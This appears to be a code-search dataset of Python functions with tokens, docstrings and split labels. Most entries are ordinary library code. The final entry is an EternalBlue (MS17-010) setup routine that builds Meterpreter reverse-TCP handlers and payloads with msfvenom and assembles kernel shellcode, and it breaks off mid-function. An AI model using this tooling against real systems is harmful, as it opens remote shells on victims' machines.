    errors = []

    # Make sure the type validates first.
    valid = self._is_valid(value)
    if not valid:
        errors.append(self.fail(value))
        return errors

    # Then validate all the constraints second.
    for constraint in self._constraints_inst:
        error = constraint.is_valid(value)
        if error:
            errors.append(error)

    return errors
[ "def", "validate", "(", "self", ",", "value", ")", ":", "errors", "=", "[", "]", "# Make sure the type validates first.", "valid", "=", "self", ".", "_is_valid", "(", "value", ")", "if", "not", "valid", ":", "errors", ".", "append", "(", "self", ".", "fail", "(", "value", ")", ")", "return", "errors", "# Then validate all the constraints second.", "for", "constraint", "in", "self", ".", "_constraints_inst", ":", "error", "=", "constraint", ".", "is_valid", "(", "value", ")", "if", "error", ":", "errors", ".", "append", "(", "error", ")", "return", "errors" ]
Check if ``value`` is valid. :returns: [errors] If ``value`` is invalid, otherwise [].
[ "Check", "if", "value", "is", "valid", "." ]
python
train
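The control flow is the point: a failed type check returns immediately, so the constraints may assume a well-typed value. A minimal sketch of the same two-phase shape with a hypothetical integer validator:

def validate_int(value, constraints):
    """Type check first; only then run the constraint callables."""
    if not isinstance(value, int):
        return ['{!r} is not an int'.format(value)]  # short-circuit
    errors = []
    for constraint in constraints:
        error = constraint(value)
        if error:
            errors.append(error)
    return errors

too_small = lambda v: 'too small' if v < 10 else None
print(validate_int('x', [too_small]))  # ["'x' is not an int"]
print(validate_int(3, [too_small]))    # ['too small']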
thomasdelaet/python-velbus
velbus/message.py
https://github.com/thomasdelaet/python-velbus/blob/af2f8af43f1a24bf854eff9f3126fd7b5c41b3dd/velbus/message.py#L62-L68
def to_binary(self):
    """
    :return: bytes
    """
    pre_checksum_data = self.__checksum_data()
    checksum = velbus.checksum(pre_checksum_data)
    return pre_checksum_data + checksum + bytes([velbus.END_BYTE])
[ "def", "to_binary", "(", "self", ")", ":", "pre_checksum_data", "=", "self", ".", "__checksum_data", "(", ")", "checksum", "=", "velbus", ".", "checksum", "(", "pre_checksum_data", ")", "return", "pre_checksum_data", "+", "checksum", "+", "bytes", "(", "[", "velbus", ".", "END_BYTE", "]", ")" ]
:return: bytes
[ ":", "return", ":", "bytes" ]
python
train
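The return line encodes a classic frame layout: payload, then a checksum over the payload, then a terminator byte. A generic sketch of that framing; the two's-complement checksum and 0x04 end byte are illustrative assumptions, not necessarily Velbus's exact algorithm or constant:

def frame(payload: bytes, end_byte: int = 0x04) -> bytes:
    checksum = bytes([(-sum(payload)) & 0xFF])  # illustrative checksum
    return payload + checksum + bytes([end_byte])

print(frame(b'\x0f\xfb\x01\x40').hex())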
hannorein/rebound
rebound/simulation.py
https://github.com/hannorein/rebound/blob/bb0f814c98e629401acaab657cae2304b0e003f7/rebound/simulation.py#L1494-L1498
def save(self, filename):
    """
    Save the entire REBOUND simulation to a binary file.
    """
    clibrebound.reb_output_binary(byref(self), c_char_p(filename.encode("ascii")))
[ "def", "save", "(", "self", ",", "filename", ")", ":", "clibrebound", ".", "reb_output_binary", "(", "byref", "(", "self", ")", ",", "c_char_p", "(", "filename", ".", "encode", "(", "\"ascii\"", ")", ")", ")" ]
Save the entire REBOUND simulation to a binary file.
[ "Save", "the", "entire", "REBOUND", "simulation", "to", "a", "binary", "file", "." ]
python
train
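A hedged usage sketch: build a small simulation, write a checkpoint with the method above, and reload it. Passing the filename to rebound.Simulation() to restore is an assumption about the reload path:

import rebound

sim = rebound.Simulation()
sim.add(m=1.0)              # star
sim.add(m=1e-3, a=1.0)      # planet at a = 1
sim.save("checkpoint.bin")  # the method shown above

restored = rebound.Simulation("checkpoint.bin")  # assumed reload API
print(restored.N)           # 2 particles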
pypyr/pypyr-cli
pypyr/steps/contextclear.py
https://github.com/pypyr/pypyr-cli/blob/4003f999cd5eb030b4c7407317de728f5115a80f/pypyr/steps/contextclear.py#L13-L46
def run_step(context):
    """Remove specified keys from context.

    Args:
        Context is a dictionary or dictionary-like.
        context['contextClear'] must exist. It's a dictionary.
        Will iterate context['contextClear'] and remove those keys from
        context.

        For example, say input context is:
            key1: value1
            key2: value2
            key3: value3
            key4: value4
            contextClear:
                - key2
                - key4
                - contextClear

        This will result in return context:
            key1: value1
            key3: value3
    """
    logger.debug("started")
    context.assert_key_has_value(key='contextClear', caller=__name__)

    for k in context['contextClear']:
        logger.debug(f"removing {k} from context")
        # slightly unorthodox pop returning None means you don't get a KeyError
        # if key doesn't exist
        context.pop(k, None)
        logger.info(f"removed {k} from context")

    logger.debug("done")
[ "def", "run_step", "(", "context", ")", ":", "logger", ".", "debug", "(", "\"started\"", ")", "context", ".", "assert_key_has_value", "(", "key", "=", "'contextClear'", ",", "caller", "=", "__name__", ")", "for", "k", "in", "context", "[", "'contextClear'", "]", ":", "logger", ".", "debug", "(", "f\"removing {k} from context\"", ")", "# slightly unorthodox pop returning None means you don't get a KeyError", "# if key doesn't exist", "context", ".", "pop", "(", "k", ",", "None", ")", "logger", ".", "info", "(", "f\"removed {k} from context\"", ")", "logger", ".", "debug", "(", "\"done\"", ")" ]
Remove specified keys from context.

Args:
    Context is a dictionary or dictionary-like.
    context['contextClear'] must exist. It's a dictionary.
    Will iterate context['contextClear'] and remove those keys from context.

    For example, say input context is:
        key1: value1
        key2: value2
        key3: value3
        key4: value4
        contextClear:
            - key2
            - key4
            - contextClear

    This will result in return context:
        key1: value1
        key3: value3
[ "Remove", "specified", "keys", "from", "context", "." ]
python
train
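The pop(k, None) detail makes the step idempotent: listing a key that is already absent is a no-op rather than a KeyError. The docstring's example, reduced to a plain dict:

context = {'key1': 'value1', 'key2': 'value2', 'key3': 'value3',
           'key4': 'value4',
           'contextClear': ['key2', 'key4', 'contextClear']}
keys_to_clear = context['contextClear']  # the loop keeps this list alive
for k in keys_to_clear:                  # even after its own key is popped
    context.pop(k, None)
print(context)  # {'key1': 'value1', 'key3': 'value3'}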
samghelms/mathviz
mathviz_hopper/src/bottle.py
https://github.com/samghelms/mathviz/blob/30fe89537379faea4de8c8b568ac6e52e4d15353/mathviz_hopper/src/bottle.py#L3602-L3614
def load_app(target):
    """ Load a bottle application from a module and make sure that the import
        does not affect the current default application, but returns a separate
        application object. See :func:`load` for the target parameter. """
    global NORUN
    NORUN, nr_old = True, NORUN
    tmp = default_app.push()  # Create a new "default application"
    try:
        rv = load(target)  # Import the target module
        return rv if callable(rv) else tmp
    finally:
        default_app.remove(tmp)  # Remove the temporary added default application
        NORUN = nr_old
[ "def", "load_app", "(", "target", ")", ":", "global", "NORUN", "NORUN", ",", "nr_old", "=", "True", ",", "NORUN", "tmp", "=", "default_app", ".", "push", "(", ")", "# Create a new \"default application\"", "try", ":", "rv", "=", "load", "(", "target", ")", "# Import the target module", "return", "rv", "if", "callable", "(", "rv", ")", "else", "tmp", "finally", ":", "default_app", ".", "remove", "(", "tmp", ")", "# Remove the temporary added default application", "NORUN", "=", "nr_old" ]
Load a bottle application from a module and make sure that the import does not affect the current default application, but returns a separate application object. See :func:`load` for the target parameter.
[ "Load", "a", "bottle", "application", "from", "a", "module", "and", "make", "sure", "that", "the", "import", "does", "not", "affect", "the", "current", "default", "application", "but", "returns", "a", "separate", "application", "object", ".", "See", ":", "func", ":", "load", "for", "the", "target", "parameter", "." ]
python
train
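A hedged usage sketch (the target module path is hypothetical): load_app imports the target inside a throwaway default app, so module-level @route decorations in the imported module don't leak into the caller's application:

from bottle import load_app

app = load_app('mypackage.server:app')  # "module:expression" target, as with load()
app.run(host='localhost', port=8080)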
nilp0inter/trelloapi
trelloapi/make_endpoints.py
https://github.com/nilp0inter/trelloapi/blob/88f4135832548ea71598d50a73943890e1cf9e20/trelloapi/make_endpoints.py#L113-L140
def main():
    """
    Prints the complete YAML.
    """
    ep = requests.get(TRELLO_API_DOC).content
    root = html.fromstring(ep)

    links = root.xpath('//a[contains(@class, "reference internal")]/@href')
    pages = [requests.get(TRELLO_API_DOC + u)
             for u in links if u.endswith('index.html')]

    endpoints = []
    for page in pages:
        root = html.fromstring(page.content)
        sections = root.xpath('//div[@class="section"]/h2/..')
        for sec in sections:
            ep_html = etree.tostring(sec).decode('utf-8')
            ep_text = html2text(ep_html).splitlines()
            match = EP_DESC_REGEX.match(ep_text[0])
            if not match:
                continue
            ep_method, ep_url = match.groups()
            ep_text[0] = ' '.join([ep_method, ep_url])
            ep_doc = b64encode(gzip.compress('\n'.join(ep_text).encode('utf-8')))
            endpoints.append((ep_method, ep_url, ep_doc))

    print(yaml.dump(create_tree(endpoints)))
[ "def", "main", "(", ")", ":", "ep", "=", "requests", ".", "get", "(", "TRELLO_API_DOC", ")", ".", "content", "root", "=", "html", ".", "fromstring", "(", "ep", ")", "links", "=", "root", ".", "xpath", "(", "'//a[contains(@class, \"reference internal\")]/@href'", ")", "pages", "=", "[", "requests", ".", "get", "(", "TRELLO_API_DOC", "+", "u", ")", "for", "u", "in", "links", "if", "u", ".", "endswith", "(", "'index.html'", ")", "]", "endpoints", "=", "[", "]", "for", "page", "in", "pages", ":", "root", "=", "html", ".", "fromstring", "(", "page", ".", "content", ")", "sections", "=", "root", ".", "xpath", "(", "'//div[@class=\"section\"]/h2/..'", ")", "for", "sec", "in", "sections", ":", "ep_html", "=", "etree", ".", "tostring", "(", "sec", ")", ".", "decode", "(", "'utf-8'", ")", "ep_text", "=", "html2text", "(", "ep_html", ")", ".", "splitlines", "(", ")", "match", "=", "EP_DESC_REGEX", ".", "match", "(", "ep_text", "[", "0", "]", ")", "if", "not", "match", ":", "continue", "ep_method", ",", "ep_url", "=", "match", ".", "groups", "(", ")", "ep_text", "[", "0", "]", "=", "' '", ".", "join", "(", "[", "ep_method", ",", "ep_url", "]", ")", "ep_doc", "=", "b64encode", "(", "gzip", ".", "compress", "(", "'\\n'", ".", "join", "(", "ep_text", ")", ".", "encode", "(", "'utf-8'", ")", ")", ")", "endpoints", ".", "append", "(", "(", "ep_method", ",", "ep_url", ",", "ep_doc", ")", ")", "print", "(", "yaml", ".", "dump", "(", "create_tree", "(", "endpoints", ")", ")", ")" ]
Prints the complete YAML.
[ "Prints", "the", "complete", "YAML", "." ]
python
valid
pytorn/torn
torn/plugins/app.py
https://github.com/pytorn/torn/blob/68ba077173a1d22236d570d933dd99a3e3f0040f/torn/plugins/app.py#L11-L22
def settings(instance):
    """Definition to set settings from config file to the app instance."""
    with open(instance.root_dir + '/Config/config.yml') as config:
        config = yaml.load(config)
        instance.name = config['name']
        instance.port = config['web']['port']
        # default host
        instance.host = "http://localhost"
        if 'host' in config['web']:
            instance.host = config['web']['host']
        instance.debug = config['debug']
    return instance
[ "def", "settings", "(", "instance", ")", ":", "with", "open", "(", "instance", ".", "root_dir", "+", "'/Config/config.yml'", ")", "as", "config", ":", "config", "=", "yaml", ".", "load", "(", "config", ")", "instance", ".", "name", "=", "config", "[", "'name'", "]", "instance", ".", "port", "=", "config", "[", "'web'", "]", "[", "'port'", "]", "# default host", "instance", ".", "host", "=", "\"http://localhost\"", "if", "'host'", "in", "config", "[", "'web'", "]", ":", "instance", ".", "host", "=", "config", "[", "'web'", "]", "[", "'host'", "]", "instance", ".", "debug", "=", "config", "[", "'debug'", "]", "return", "instance" ]
Definition to set settings from config file to the app instance.
[ "Definition", "to", "set", "settings", "from", "config", "file", "to", "the", "app", "instance", "." ]
python
train
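A hedged sketch of the config.yml shape this expects, with the keys inferred from the lookups above and placeholder values; note that bare yaml.load() without a Loader is deprecated since PyYAML 5.1, so the sketch uses safe_load:

import yaml

config_text = """
name: myapp
debug: true
web:
  port: 8000
  host: http://example.test  # optional; defaults to http://localhost
"""
config = yaml.safe_load(config_text)
print(config['name'], config['web']['port'])  # myapp 8000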
sethmlarson/virtualbox-python
virtualbox/library.py
https://github.com/sethmlarson/virtualbox-python/blob/706c8e3f6e3aee17eb06458e73cbb4bc2d37878b/virtualbox/library.py#L13471-L13532
def mount_medium(self, name, controller_port, device, medium, force):
    """Mounts a medium (:py:class:`IMedium` , identified by the given UUID @a id)
    to the given storage controller (:py:class:`IStorageController` ,
    identified by @a name), at the indicated port and device. The device
    must already exist; see :py:func:`IMachine.attach_device` for how to
    attach a new device.

    This method is intended only for managing removable media, where the
    device is fixed but media is changeable at runtime (such as DVDs and
    floppies). It cannot be used for fixed media such as hard disks.

    The @a controllerPort and @a device parameters specify the device slot
    and have have the same meaning as with :py:func:`IMachine.attach_device` .

    The specified device slot can have a medium mounted, which will be
    unmounted first. Specifying a zero UUID (or an empty string) for
    @a medium does just an unmount.

    See :py:class:`IMedium` for more detailed information about attaching
    media.

    in name of type str
        Name of the storage controller to attach the medium to.

    in controller_port of type int
        Port to attach the medium to.

    in device of type int
        Device slot in the given port to attach the medium to.

    in medium of type :class:`IMedium`
        Medium to mount or @c null for an empty drive.

    in force of type bool
        Allows to force unmount/mount of a medium which is locked by
        the device slot in the given port to attach the medium to.

    raises :class:`OleErrorInvalidarg`
        SATA device, SATA port, IDE port or IDE slot out of range.

    raises :class:`VBoxErrorInvalidObjectState`
        Attempt to attach medium to an unregistered virtual machine.

    raises :class:`VBoxErrorInvalidVmState`
        Invalid machine state.

    raises :class:`VBoxErrorObjectInUse`
        Medium already attached to this or another virtual machine.
    """
    if not isinstance(name, basestring):
        raise TypeError("name can only be an instance of type basestring")
    if not isinstance(controller_port, baseinteger):
        raise TypeError("controller_port can only be an instance of type baseinteger")
    if not isinstance(device, baseinteger):
        raise TypeError("device can only be an instance of type baseinteger")
    if not isinstance(medium, IMedium):
        raise TypeError("medium can only be an instance of type IMedium")
    if not isinstance(force, bool):
        raise TypeError("force can only be an instance of type bool")
    self._call("mountMedium",
               in_p=[name, controller_port, device, medium, force])
[ "def", "mount_medium", "(", "self", ",", "name", ",", "controller_port", ",", "device", ",", "medium", ",", "force", ")", ":", "if", "not", "isinstance", "(", "name", ",", "basestring", ")", ":", "raise", "TypeError", "(", "\"name can only be an instance of type basestring\"", ")", "if", "not", "isinstance", "(", "controller_port", ",", "baseinteger", ")", ":", "raise", "TypeError", "(", "\"controller_port can only be an instance of type baseinteger\"", ")", "if", "not", "isinstance", "(", "device", ",", "baseinteger", ")", ":", "raise", "TypeError", "(", "\"device can only be an instance of type baseinteger\"", ")", "if", "not", "isinstance", "(", "medium", ",", "IMedium", ")", ":", "raise", "TypeError", "(", "\"medium can only be an instance of type IMedium\"", ")", "if", "not", "isinstance", "(", "force", ",", "bool", ")", ":", "raise", "TypeError", "(", "\"force can only be an instance of type bool\"", ")", "self", ".", "_call", "(", "\"mountMedium\"", ",", "in_p", "=", "[", "name", ",", "controller_port", ",", "device", ",", "medium", ",", "force", "]", ")" ]
Mounts a medium (:py:class:`IMedium` , identified by the given UUID @a id)
to the given storage controller (:py:class:`IStorageController` ,
identified by @a name), at the indicated port and device. The device
must already exist; see :py:func:`IMachine.attach_device` for how to
attach a new device.

This method is intended only for managing removable media, where the
device is fixed but media is changeable at runtime (such as DVDs and
floppies). It cannot be used for fixed media such as hard disks.

The @a controllerPort and @a device parameters specify the device slot
and have have the same meaning as with :py:func:`IMachine.attach_device` .

The specified device slot can have a medium mounted, which will be
unmounted first. Specifying a zero UUID (or an empty string) for
@a medium does just an unmount.

See :py:class:`IMedium` for more detailed information about attaching
media.

in name of type str
    Name of the storage controller to attach the medium to.

in controller_port of type int
    Port to attach the medium to.

in device of type int
    Device slot in the given port to attach the medium to.

in medium of type :class:`IMedium`
    Medium to mount or @c null for an empty drive.

in force of type bool
    Allows to force unmount/mount of a medium which is locked by
    the device slot in the given port to attach the medium to.

raises :class:`OleErrorInvalidarg`
    SATA device, SATA port, IDE port or IDE slot out of range.

raises :class:`VBoxErrorInvalidObjectState`
    Attempt to attach medium to an unregistered virtual machine.

raises :class:`VBoxErrorInvalidVmState`
    Invalid machine state.

raises :class:`VBoxErrorObjectInUse`
    Medium already attached to this or another virtual machine.
[ "Mounts", "a", "medium", "(", ":", "py", ":", "class", ":", "IMedium", "identified", "by", "the", "given", "UUID", "@a", "id", ")", "to", "the", "given", "storage", "controller", "(", ":", "py", ":", "class", ":", "IStorageController", "identified", "by", "@a", "name", ")", "at", "the", "indicated", "port", "and", "device", ".", "The", "device", "must", "already", "exist", ";", "see", ":", "py", ":", "func", ":", "IMachine", ".", "attach_device", "for", "how", "to", "attach", "a", "new", "device", ".", "This", "method", "is", "intended", "only", "for", "managing", "removable", "media", "where", "the", "device", "is", "fixed", "but", "media", "is", "changeable", "at", "runtime", "(", "such", "as", "DVDs", "and", "floppies", ")", ".", "It", "cannot", "be", "used", "for", "fixed", "media", "such", "as", "hard", "disks", ".", "The", "@a", "controllerPort", "and", "@a", "device", "parameters", "specify", "the", "device", "slot", "and", "have", "have", "the", "same", "meaning", "as", "with", ":", "py", ":", "func", ":", "IMachine", ".", "attach_device", ".", "The", "specified", "device", "slot", "can", "have", "a", "medium", "mounted", "which", "will", "be", "unmounted", "first", ".", "Specifying", "a", "zero", "UUID", "(", "or", "an", "empty", "string", ")", "for", "@a", "medium", "does", "just", "an", "unmount", ".", "See", ":", "py", ":", "class", ":", "IMedium", "for", "more", "detailed", "information", "about", "attaching", "media", "." ]
python
train
osfclient/osfclient
osfclient/cli.py
https://github.com/osfclient/osfclient/blob/44b9a87e8c1ae6b63cdecd27a924af3fc2bf94cf/osfclient/cli.py#L82-L103
def might_need_auth(f):
    """Decorate a CLI function that might require authentication.

    Catches any UnauthorizedException raised, prints a helpful message and
    then exits.
    """
    @wraps(f)
    def wrapper(cli_args):
        try:
            return_value = f(cli_args)
        except UnauthorizedException as e:
            config = config_from_env(config_from_file())
            username = _get_username(cli_args, config)

            if username is None:
                sys.exit("Please set a username (run `osf -h` for details).")
            else:
                sys.exit("You are not authorized to access this project.")

        return return_value

    return wrapper
[ "def", "might_need_auth", "(", "f", ")", ":", "@", "wraps", "(", "f", ")", "def", "wrapper", "(", "cli_args", ")", ":", "try", ":", "return_value", "=", "f", "(", "cli_args", ")", "except", "UnauthorizedException", "as", "e", ":", "config", "=", "config_from_env", "(", "config_from_file", "(", ")", ")", "username", "=", "_get_username", "(", "cli_args", ",", "config", ")", "if", "username", "is", "None", ":", "sys", ".", "exit", "(", "\"Please set a username (run `osf -h` for details).\"", ")", "else", ":", "sys", ".", "exit", "(", "\"You are not authorized to access this project.\"", ")", "return", "return_value", "return", "wrapper" ]
Decorate a CLI function that might require authentication. Catches any UnauthorizedException raised, prints a helpful message and then exits.
[ "Decorate", "a", "CLI", "function", "that", "might", "require", "authentication", "." ]
python
valid
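The decorator's shape generalizes well: wrap the handler, catch the domain exception, and exit with guidance instead of a traceback. A self-contained sketch with stand-in names:

import sys
from functools import wraps

class UnauthorizedException(Exception):
    pass

def might_need_auth(f):
    @wraps(f)
    def wrapper(cli_args):
        try:
            return f(cli_args)
        except UnauthorizedException:
            sys.exit("You are not authorized to access this project.")
    return wrapper

@might_need_auth
def fetch(cli_args):
    raise UnauthorizedException()

# fetch({})  # would exit with the friendly message, not a traceback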
Pipoline/rocket-python
rocketchat/api.py
https://github.com/Pipoline/rocket-python/blob/643ece8a9db106922e019984a859ca04283262ff/rocketchat/api.py#L160-L167
def delete_public_room(self, room_id, **kwargs):
    """
    Delete room with given ID
    :param room_id: Room ID
    :param kwargs:
    :return:
    """
    return DeletePublicRoom(settings=self.settings, **kwargs).call(room_id=room_id, **kwargs)
[ "def", "delete_public_room", "(", "self", ",", "room_id", ",", "*", "*", "kwargs", ")", ":", "return", "DeletePublicRoom", "(", "settings", "=", "self", ".", "settings", ",", "*", "*", "kwargs", ")", ".", "call", "(", "room_id", "=", "room_id", ",", "*", "*", "kwargs", ")" ]
Delete room with given ID :param room_id: Room ID :param kwargs: :return:
[ "Delete", "room", "with", "given", "ID", ":", "param", "room_id", ":", "Room", "ID", ":", "param", "kwargs", ":", ":", "return", ":" ]
python
train
hvac/hvac
hvac/api/secrets_engines/identity.py
https://github.com/hvac/hvac/blob/cce5b86889193f622c2a72a4a1b7e1c9c8aff1ce/hvac/api/secrets_engines/identity.py#L674-L693
def delete_group(self, group_id, mount_point=DEFAULT_MOUNT_POINT):
    """Delete a group.

    Supported methods:
        DELETE: /{mount_point}/group/id/{id}. Produces: 204 (empty body)

    :param group_id: Identifier of the entity.
    :type group_id: str | unicode
    :param mount_point: The "path" the method/backend was mounted on.
    :type mount_point: str | unicode
    :return: The response of the request.
    :rtype: requests.Response
    """
    api_path = '/v1/{mount_point}/group/id/{id}'.format(
        mount_point=mount_point,
        id=group_id,
    )
    return self._adapter.delete(
        url=api_path,
    )
[ "def", "delete_group", "(", "self", ",", "group_id", ",", "mount_point", "=", "DEFAULT_MOUNT_POINT", ")", ":", "api_path", "=", "'/v1/{mount_point}/group/id/{id}'", ".", "format", "(", "mount_point", "=", "mount_point", ",", "id", "=", "group_id", ",", ")", "return", "self", ".", "_adapter", ".", "delete", "(", "url", "=", "api_path", ",", ")" ]
Delete a group. Supported methods: DELETE: /{mount_point}/group/id/{id}. Produces: 204 (empty body) :param group_id: Identifier of the entity. :type group_id: str | unicode :param mount_point: The "path" the method/backend was mounted on. :type mount_point: str | unicode :return: The response of the request. :rtype: requests.Response
[ "Delete", "a", "group", "." ]
python
train
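A hedged usage sketch against a running Vault; the URL, token and group ID are placeholders, and the accessor path follows hvac's documented client layout:

import hvac

client = hvac.Client(url='https://vault.example.test:8200', token='s.placeholder')
response = client.secrets.identity.delete_group(
    group_id='7d6b45ca-9fe1-7e1f-6424-b4c5b7b102c5',
)
print(response.status_code)  # 204 on success, per the docstring above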
fastavro/fastavro
fastavro/_write_py.py
https://github.com/fastavro/fastavro/blob/bafe826293e19eb93e77bbb0f6adfa059c7884b2/fastavro/_write_py.py#L148-L203
def prepare_fixed_decimal(data, schema):
    """Converts decimal.Decimal to fixed length bytes array"""
    if not isinstance(data, decimal.Decimal):
        return data
    scale = schema.get('scale', 0)
    size = schema['size']

    # based on https://github.com/apache/avro/pull/82/
    sign, digits, exp = data.as_tuple()
    if -exp > scale:
        raise ValueError(
            'Scale provided in schema does not match the decimal')
    delta = exp + scale
    if delta > 0:
        digits = digits + (0,) * delta

    unscaled_datum = 0
    for digit in digits:
        unscaled_datum = (unscaled_datum * 10) + digit

    bits_req = unscaled_datum.bit_length() + 1
    size_in_bits = size * 8
    offset_bits = size_in_bits - bits_req

    mask = 2 ** size_in_bits - 1
    bit = 1
    for i in range(bits_req):
        mask ^= bit
        bit <<= 1

    if bits_req < 8:
        bytes_req = 1
    else:
        bytes_req = bits_req // 8
        if bits_req % 8 != 0:
            bytes_req += 1

    tmp = MemoryIO()

    if sign:
        unscaled_datum = (1 << bits_req) - unscaled_datum
        unscaled_datum = mask | unscaled_datum
        for index in range(size - 1, -1, -1):
            bits_to_write = unscaled_datum >> (8 * index)
            tmp.write(mk_bits(bits_to_write & 0xff))
    else:
        for i in range(offset_bits // 8):
            tmp.write(mk_bits(0))
        for index in range(bytes_req - 1, -1, -1):
            bits_to_write = unscaled_datum >> (8 * index)
            tmp.write(mk_bits(bits_to_write & 0xff))

    return tmp.getvalue()
[ "def", "prepare_fixed_decimal", "(", "data", ",", "schema", ")", ":", "if", "not", "isinstance", "(", "data", ",", "decimal", ".", "Decimal", ")", ":", "return", "data", "scale", "=", "schema", ".", "get", "(", "'scale'", ",", "0", ")", "size", "=", "schema", "[", "'size'", "]", "# based on https://github.com/apache/avro/pull/82/", "sign", ",", "digits", ",", "exp", "=", "data", ".", "as_tuple", "(", ")", "if", "-", "exp", ">", "scale", ":", "raise", "ValueError", "(", "'Scale provided in schema does not match the decimal'", ")", "delta", "=", "exp", "+", "scale", "if", "delta", ">", "0", ":", "digits", "=", "digits", "+", "(", "0", ",", ")", "*", "delta", "unscaled_datum", "=", "0", "for", "digit", "in", "digits", ":", "unscaled_datum", "=", "(", "unscaled_datum", "*", "10", ")", "+", "digit", "bits_req", "=", "unscaled_datum", ".", "bit_length", "(", ")", "+", "1", "size_in_bits", "=", "size", "*", "8", "offset_bits", "=", "size_in_bits", "-", "bits_req", "mask", "=", "2", "**", "size_in_bits", "-", "1", "bit", "=", "1", "for", "i", "in", "range", "(", "bits_req", ")", ":", "mask", "^=", "bit", "bit", "<<=", "1", "if", "bits_req", "<", "8", ":", "bytes_req", "=", "1", "else", ":", "bytes_req", "=", "bits_req", "//", "8", "if", "bits_req", "%", "8", "!=", "0", ":", "bytes_req", "+=", "1", "tmp", "=", "MemoryIO", "(", ")", "if", "sign", ":", "unscaled_datum", "=", "(", "1", "<<", "bits_req", ")", "-", "unscaled_datum", "unscaled_datum", "=", "mask", "|", "unscaled_datum", "for", "index", "in", "range", "(", "size", "-", "1", ",", "-", "1", ",", "-", "1", ")", ":", "bits_to_write", "=", "unscaled_datum", ">>", "(", "8", "*", "index", ")", "tmp", ".", "write", "(", "mk_bits", "(", "bits_to_write", "&", "0xff", ")", ")", "else", ":", "for", "i", "in", "range", "(", "offset_bits", "//", "8", ")", ":", "tmp", ".", "write", "(", "mk_bits", "(", "0", ")", ")", "for", "index", "in", "range", "(", "bytes_req", "-", "1", ",", "-", "1", ",", "-", "1", ")", ":", "bits_to_write", "=", "unscaled_datum", ">>", "(", "8", "*", "index", ")", "tmp", ".", "write", "(", "mk_bits", "(", "bits_to_write", "&", "0xff", ")", ")", "return", "tmp", ".", "getvalue", "(", ")" ]
Converts decimal.Decimal to fixed length bytes array
[ "Converts", "decimal", ".", "Decimal", "to", "fixed", "length", "bytes", "array" ]
python
train
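A worked example pins the encoding down: Decimal('3.14') with scale=2 and size=4 has unscaled value 314, stored two's-complement big-endian and left-padded to 4 bytes, i.e. 00 00 01 3A. The same bytes via int.to_bytes:

import decimal

d = decimal.Decimal('3.14')
sign, digits, exp = d.as_tuple()            # (0, (3, 1, 4), -2)
unscaled = int(''.join(map(str, digits)))   # 314
print(unscaled.to_bytes(4, 'big', signed=True))  # b'\x00\x00\x01:' == 00 00 01 3A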
vertical-knowledge/ripozo-sqlalchemy
ripozo_sqlalchemy/alchemymanager.py
https://github.com/vertical-knowledge/ripozo-sqlalchemy/blob/4bcc57ec6db1b39b84b50553bb264e4950ce4ec2/ripozo_sqlalchemy/alchemymanager.py#L217-L236
def update(self, session, lookup_keys, updates, *args, **kwargs):
    """
    Updates the model with the specified lookup_keys and returns
    the dictified object.

    :param Session session: The SQLAlchemy session to use
    :param dict lookup_keys: A dictionary mapping the fields
        and their expected values
    :param dict updates: The columns and the values to update
        them to.
    :return: The dictionary of keys and values for the retrieved
        model. The only values returned will be those specified by
        fields attrbute on the class
    :rtype: dict
    :raises: NotFoundException
    """
    model = self._get_model(lookup_keys, session)
    model = self._set_values_on_model(model, updates, fields=self.update_fields)
    session.commit()
    return self.serialize_model(model)
[ "def", "update", "(", "self", ",", "session", ",", "lookup_keys", ",", "updates", ",", "*", "args", ",", "*", "*", "kwargs", ")", ":", "model", "=", "self", ".", "_get_model", "(", "lookup_keys", ",", "session", ")", "model", "=", "self", ".", "_set_values_on_model", "(", "model", ",", "updates", ",", "fields", "=", "self", ".", "update_fields", ")", "session", ".", "commit", "(", ")", "return", "self", ".", "serialize_model", "(", "model", ")" ]
Updates the model with the specified lookup_keys and returns
the dictified object.

:param Session session: The SQLAlchemy session to use
:param dict lookup_keys: A dictionary mapping the fields and their expected values
:param dict updates: The columns and the values to update them to.
:return: The dictionary of keys and values for the retrieved model.
    The only values returned will be those specified by fields attrbute on the class
:rtype: dict
:raises: NotFoundException
[ "Updates", "the", "model", "with", "the", "specified", "lookup_keys", "and", "returns", "the", "dictified", "object", "." ]
python
train
mwgielen/jackal
jackal/scripts/eternalblue.py
https://github.com/mwgielen/jackal/blob/7fe62732eb5194b7246215d5277fb37c398097bf/jackal/scripts/eternalblue.py#L30-L95
def setup(self):
    """
    This function will call msfvenom, nasm and git via subprocess to setup all the things.
    Returns True if everything went well, otherwise returns False.
    """
    lport64 = self.port64
    lport32 = self.port32
    print_notification("Using ip: {}".format(self.ip))
    print_notification("Generating metasploit resource file")
    resource = """use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST {ip}
set LPORT {port64}
set ExitOnSession false
run -j
set payload windows/meterpreter/reverse_tcp
set LHOST {ip}
set LPORT {port32}
set ExitOnSession false
run -j
""".format(ip=self.ip, port64=lport64, port32=lport32)
    self.resource_file = os.path.join(self.datadir, 'ms17_resource.rc')
    with open(self.resource_file, 'w') as f:
        f.write(resource)
    print_success("Resource file created, run the following command in msfconsole:")
    print_success("resource {}".format(self.resource_file))
    command_64 = "msfvenom -p windows/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f raw -o {datadir}/payload32.bin".format(ip=self.ip, port=lport32, datadir=self.datadir)
    command_32 = "msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f raw -o {datadir}/payload64.bin".format(ip=self.ip, port=lport64, datadir=self.datadir)
    print_notification("Generating payloads")
    process = subprocess.run(command_32.split(' '), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    if process.returncode != 0:
        print_error("Problem with generating payload:")
        print_error(process.stderr)
        return False
    process = subprocess.run(command_64.split(' '), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    if process.returncode != 0:
        print_error("Problem with generating payload:")
        print_error(process.stderr)
        return False
    if not os.path.exists(os.path.join(self.datadir, 'MS17-010')):
        print_notification("Git repo was not found, cloning")
        process = subprocess.run("git clone https://github.com/mwgielen/MS17-010 {dir}".format(dir=os.path.join(self.datadir, 'MS17-010')).split(' '))
        if process.returncode != 0:
            print_error("Problems with cloning git")
            return False
    process = subprocess.run("nasm {datadir}/MS17-010/shellcode/eternalblue_kshellcode_x64.asm -o {datadir}/kshell64.bin".format(datadir=self.datadir).split(' '))
    if process.returncode != 0:
        print_error("Problems with NASM")
        return False
    process = subprocess.run("nasm {datadir}/MS17-010/shellcode/eternalblue_kshellcode_x86.asm -o {datadir}/kshell86.bin".format(datadir=self.datadir).split(' '))
    if process.returncode != 0:
        print_error("Problems with NASM")
        return False
